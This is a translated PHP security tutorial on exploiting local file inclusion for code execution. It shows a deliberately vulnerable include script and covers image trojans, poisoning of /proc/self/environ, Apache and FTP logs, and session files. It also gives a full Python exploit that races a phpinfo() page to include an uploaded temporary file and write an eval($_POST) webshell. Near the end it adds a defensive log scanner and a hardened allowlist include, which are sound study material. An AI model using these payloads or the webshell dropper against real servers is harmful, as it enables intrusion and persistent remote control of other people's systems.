Attackers can exploit local file inclusion vulnerabilities to execute arbitrary code.

Source: Internet
Author: User
Tags: apache, log

Abstract: On the Internet, write-ups on exploiting Local File Include (LFI) vulnerabilities are scattered, and most of them are brief and give no examples. Building on other people's papers, this article adds practical demonstration examples and source code, and adds another way to exploit this vulnerability: including the session file.
 
Keywords: LFI, local file inclusion, exploitation code, summary of exploitation methods
 
1 Overview
 
Local File Include is a basic feature of PHP scripts, and programmers often use it for convenience during development. For example, if you write a series of utility functions into function.php, any file that needs them can call them by putting a single line at the top: <?php include "function.php"; ?>. After that the functions defined in function.php can be called directly.
A local file inclusion vulnerability is a typical high-risk vulnerability in PHP. Because the programmer does not check user-controllable input, the user can control which file is included. On successful exploitation the web server executes a file of the user's choosing as PHP, and as a result the user obtains a degree of control over the server.
 
2 Using LFI to execute PHP code
 
2.1 Local vulnerability demonstration
 
The code of the demo script file test.php is as follows (the file parameter goes straight from the query string into require without any filtering; that is the vulnerability demonstrated below):
<?php
if (!ini_get('display_errors')) {
    ini_set('display_errors', 'on');
}
error_reporting(E_ALL);
// user-controlled value, used unfiltered in the require below
$f = $_GET["file"];
if ($f) {
    require "" . $f . ".php";
} else {
    print("No file included");
}
?>
In normal use the request looks like http://www.xxx.com/test.php?file=function, which includes the function file. However, because the file parameter is not filtered, we can submit any value we like, which leads to the inclusion vulnerability. For example, submit:
http://www.xxx.com/index.php?file=shell.txt%00, where shell.txt contains our webshell (the %00 null byte truncates the .php suffix the script appends; see 2.2). Because the including script index.php is PHP, the contents of shell.txt are executed as PHP code.
Build a test environment on a virtual machine. First access test.php directly without the file parameter:

Figure 1. test.php when no parameters are submitted
Then assign the file parameter the value /etc/passwd:

Figure 2. Including the /etc/passwd file
The file is included successfully.
 
2.2 Uploading a file and including it
 
Here we combine the inclusion vulnerability with file upload points on the server, such as avatar upload or album photo upload, together with the %00 truncation feature of PHP (this truncation has been fixed since PHP 5.4; in this example %00 is no longer used, so test other functions yourself).
Suppose we can upload a custom avatar. Avatar files are stored under photo in the root directory of the website, and the exact directory can be seen from the image URL.
First we make an image file that contains malicious code:
Take a normal image file photo.jpg and run copy photo.jpg/b + shell.php/b eval.jpg in the Windows command line.

Figure 3. Creating an image Trojan with the copy command in Windows
Both eval.jpg and photo.jpg open normally as images.
This method is useful against strict upload checks. In fact, simply changing the suffix and adding GIF89a before the PHP code bypasses most checks.
Upload eval.jpg and include it. The effect is as follows:

Figure 4. Effect of the Trojan
In this way, PHP code is successfully executed through the local inclusion vulnerability.
 
2.3 Including the environment variable file
 
On Linux there is a file /proc/self/environ which stores the environment variables of the current process. Its content is as follows:

Figure 5. Content of the /proc/self/environ file on BT5
Although the file holds system variables, the browser's User-Agent ends up in it as well, so we can insert our own content by modifying the browser's user agent, write PHP code there, and then include the file with LFI to exploit the vulnerability.
First verify the access permission to see whether the file content can be read.

Figure 6. Including the /proc/self/environ file
Access is denied by default on the BT server. The permissions are as follows:

Figure 7. Permission settings of the environ file
To facilitate the demonstration, use an environment where the environ file is readable.
Normal inclusion:

Figure 8. Including the environ file with permission
We can see that the current USER_AGENT variable is written into this file, and the User-Agent can be forged. Here I use Firefox's UAControl add-on to forge it. First edit UAControl's user agent information for this site:

Figure 9. Modifying the User-Agent information
Then access the site's page again and include the environ file once more:

Figure 10. PHP code executed successfully
We can see that the PHP code has been executed.
2.4 Including web server log files
Apache log files are very commonly used in LFI exploitation, because whether we submit a GET or a POST request, Apache records it in the log file. Therefore we can control the request content, write malicious code into the log file, and then include it.
First check whether we have permission to include the log:

Figure 11. Access denied by default
As before, access is denied by default.

Figure 12. Default log file permissions
Next we find an environment with sufficient permissions for testing.
You can include httpd.conf to view the location of the log files and the configured file name format. Here we find a usable log, php_error.log, which records errors raised while executing PHP:

Figure 13. Content of the php_error log file
So we directly request test.php?file=../<?php phpinfo();?> and the request, including the PHP code, is recorded. In this way the PHP code is written into the log file.
Direct access:

Figure 14. Inserting PHP code through a GET request
A blank page is returned because the request causes an error and error display is not enabled on the web server, but the error is written to the log.
Then include the error log:

Figure 15. The error log file is included successfully
The PHP code is executed successfully.
In actual use, pay attention to the following issues:
1) access.log and error.log may be too large, which can cause a timeout. So if another file can be included, prefer including another file.
2) The written code may be escaped. For example, when we submit test.php?file=../<?php phpinfo();?>, there is a space after <?php. If the browser encodes that space as %20, the PHP code will not execute. The two angle brackets may also be escaped when the request is written to access.log. In actual tests, Firefox and IE8 escape them but IE6 does not. In all these cases, use IE6 or submit the GET request directly with nc. At the same time, if short_open_tag is enabled on the web server, the space escaping is not a concern.
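From the defender's side, the log-poisoning and /proc/self/environ techniques of sections 2.3 and 2.4 leave a clear trace in the web server's own access log: PHP open tags, directory traversal, null bytes and log or environ paths inside request URIs and User-Agent strings. The following scanner is an added example, not code from the original article; the Apache combined-format log lines are constructed for it (the first is benign, the rest reproduce the request shapes this article describes), and the rule names are assumptions.

```php
<?php
// Added example (not from the original article): flag access-log lines that
// look like LFI probing or log/environ poisoning. Sample lines are constructed.
$sample_log = <<<'LOG'
10.0.0.5 - - [10/Mar/2012:10:01:02 +0000] "GET /test.php?file=function HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2012:10:02:15 +0000] "GET /test.php?file=../../../../proc/self/environ%00 HTTP/1.1" 200 2048 "-" "<?php phpinfo(); ?>"
10.0.0.9 - - [10/Mar/2012:10:03:40 +0000] "GET /test.php?file=../<?php phpinfo();?> HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2012:10:04:01 +0000] "GET /test.php?file=../../var/log/apache2/access.log%00 HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
LOG;

// Each rule: name (assumed) => regex applied to the raw log line. PHP tags are
// checked both raw and URL-encoded, since browsers may escape them (see 2.4).
$rules = [
    'php-tag'         => '/<\?(php|=)|%3C%3F(php|%3D)?/i',
    'traversal'       => '/(\.\.[\/\\\\]|%2e%2e(%2f|%5c))/i',
    'null-byte'       => '/%00/',
    'environ-include' => '/proc\/self\/environ/i',
    'log-include'     => '/(access|error)\.log|\/sess_[a-z0-9]+/i',
];

/**
 * Scan a log in memory and return [line number => [rule names matched]]
 * for every line that matched at least one rule.
 */
function scan_access_log(string $log, array $rules): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $i => $line) {
        $matched = [];
        foreach ($rules as $name => $re) {
            if (preg_match($re, $line)) {
                $matched[] = $name;
            }
        }
        if ($matched) {
            $hits[$i + 1] = $matched;
        }
    }
    return $hits;
}

foreach (scan_access_log($sample_log, $rules) as $n => $names) {
    printf("line %d: %s\n", $n, implode(', ', $names));
}
```

In practice the same rules can be applied line by line to the real access.log with fopen()/fgets() rather than loading it whole, since a poisoned log can be very large.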
 
2.5 Including other log files

The file inclusion vulnerability is essentially about including a file whose content we can control, so other log files can also be included and used as long as we can control their content. The FTP log file is used as an example here.
In actual use, first determine the Linux distribution and FTP server version of the target system, then find the default log directory.
The first step is to test whether we have permission to read the file:

Figure 16. Content of the FTP log file
It can be read and included.
Next, log in locally over FTP, but with the user name <?php phpinfo();?>:

Figure 17. Inserting PHP code in the login window
The effect after successful inclusion is as follows:

Figure 18. The FTP log file is included successfully
The PHP code has been executed successfully.
 
2.6 Using phpinfo to include temporary files

PHP has a feature: whenever a POST request carrying multipart upload data is sent to any PHP file on the server, a temporary file is created, by default in the tmp directory with a random file name. We could of course try to guess the name by brute force, but that is impractical. A foreign security researcher [1] proposed using phpinfo() to find the path of the uploaded file, because phpinfo() prints the current request's data, including the temporary file name and directory generated on the server. The temporary file is deleted as soon as the request finishes, so the exploit pads the request to delay the phpinfo() response and includes the file while it still exists. So with a phpinfo() page we can find the temporary file name and use it.
The following is the Python exploitation code (Python 2, as originally written):
#!/usr/bin/env python
# encoding=utf-8
# author: idwar
# http://secer.org
# Note: this PoC is Python 2 code (urllib2, print statement).

'''
You may need to change the following:
1. host
2. port
3. name and path of the phpinfo page in the request
4. the URL in the hello_lfi() function, i.e. the page and parameter with the LFI
5. if it fails or reports an error, try increasing the padding length to 7000 or 8000
6. if magic_quotes_gpc is enabled or %00 cannot be used, try another truncation method and modify the position in (4)
Good Luck :)
'''

import re
import urllib2
import hashlib
from socket import *

host = '192.168.92.132'
# host = gethostbyname(domain)
port = 80
shell_name = hashlib.md5(host).hexdigest() + '.php'

# phpinfo() prints $_FILES HTML-escaped, so "=>" appears as "=&gt;"
pattern = re.compile(r'''\[tmp_name\]\s=&gt;\s(.*)\W*error]''')

# content of the uploaded part: PHP code that writes the webshell next to the LFI page
payload = '''idwar<?php fputs(fopen('./''' + shell_name + '''\',"w"),"idwar was here<?php eval(\$_POST[a]);?>")?>\r'''
req = '''-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r''' % payload

# large padding slows down the phpinfo() response so the temporary file
# still exists when it is included
padding = 'A' * 8000
request = '''POST /test/1.php?a=''' + padding + ''' HTTP/1.0\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=''' + padding + '''\r
HTTP_ACCEPT: ''' + padding + '''\r
HTTP_USER_AGENT: ''' + padding + '''\r
HTTP_ACCEPT_LANGUAGE: ''' + padding + '''\r
HTTP_PRAGMA: ''' + padding + '''\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s''' % (len(req), host, req)

def hello_lfi():
    while 1:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, port))
        s.send(request)
        data = ''
        while r'</body>' not in data:
            data = s.recv(9999)
            if not data:
                break  # connection closed without a match; retry with a new request
            search_ = re.search(pattern, data)
            if search_:
                tmp_file_name = search_.group(1)
                # include the temporary file through the LFI page (%00 truncates the appended suffix)
                url = r'http://192.168.92.132/test/2.php?s=%s%%00' % tmp_file_name
                print url
                search_request = urllib2.Request(url)
                search_response = urllib2.urlopen(search_request)
                html_data = search_response.read()
                if 'idwar' in html_data:
                    s.close()
                    return '\nDone. Your webshell is:\n%s\n' % ('http://' + host + '/' + shell_name)
        s.close()

if __name__ == '__main__':
    print hello_lfi()
    print '\nGood Luck :)'
The effect of running the exploit is as follows:

Figure 19. Using the temporary PHP file with the tool

Figure 20. The file is indeed generated on the server
We can see that the temporary file name is obtained successfully and the malicious code is injected through the temporary file in the server's tmp directory.
 
2.7 Including session files

Session files are generally stored in /tmp/, /var/lib/php/session/ and similar directories. The file names generally have the form sess_SESSIONID.
First find the session file name (it can be viewed with the Firecookie plug-in for Firefox) and include it once.
Pay attention to the following points in actual use:
1) The website may not generate a session file at all: it may store user information in cookies, or have no user information.
2) We need to control the content of the session file. First include the current session file to see whether any variable in the session is controllable, such as a value taken from the URL or the current user's user name. If so, we can write malicious code into the session file by modifying that controllable value. If there is none, check whether the server writes error messages into the user's session file; sometimes it does, and then we can craft a request that causes an error so that the malicious code is written into the session.
 
3 Summary
From the developer's point of view, every variable a user can control must be strictly checked and filtered; a vulnerability may exist anywhere the user can supply input. From the attacker's point of view, the thing to keep in mind when exploiting LFI is that anywhere on the server we can write data, we can include.
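As an added example (not code from the original article), the following is a hardened replacement for the test.php shown in section 2.1: the user value is never used as a path but only as a key into a fixed allowlist, which closes every variant described above (traversal, %00 truncation, environ, logs, session and temporary files). The include directory, the allowlist entries and the parameter name are assumptions for this example; it needs PHP 7.1 or later.

```php
<?php
// Added example, not from the original article: hardened replacement for the
// vulnerable test.php of section 2.1. Directory and file names are assumed.

const INCLUDE_DIR = __DIR__ . '/includes';
const ALLOWED_FILES = [
    'function' => 'function.php',
    'header'   => 'header.php',
    'footer'   => 'footer.php',
];

/**
 * Map a user-supplied module name to an absolute path, or return null.
 * Anything that is not an exact allowlist key is rejected, so "../",
 * "%00", /proc/self/environ, log files and sess_* files are unreachable.
 */
function resolve_include(string $name): ?string
{
    // Only short plain identifiers are accepted; this also rejects the NUL
    // byte used for the %00 truncation trick from section 2.2.
    if (!preg_match('/^[a-z0-9_]{1,32}$/D', $name)) {
        return null;
    }
    if (!array_key_exists($name, ALLOWED_FILES)) {
        return null;
    }
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . ALLOWED_FILES[$name]);
    // Defence in depth: the resolved file must still live inside INCLUDE_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$f = $_GET['file'] ?? '';
if (!is_string($f)) {
    $f = '';   // file[]=... would arrive as an array
}
$path = resolve_include($f);
if ($path === null) {
    http_response_code(400);
    print('No such file');
    exit;
}
require $path;
```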
 
4 References
[1] Gynvael Coldwind, "PHP_LFI_rfc1867_temporary_files", 2011.3
[2] SirGod, insecurity-ro, "Shell via LFI - proc/self/environ method"
[3] "Using phpinfo for LFI", http://www.bkjia.com/article/201202/119213.html
[4] "POST method uploads", http://www.php.net/manual/en/features.file-upload.post-method.php
[5] LengF, 80sec Group, "PHP security: LFI vulnerability GetShell method parade", 2011
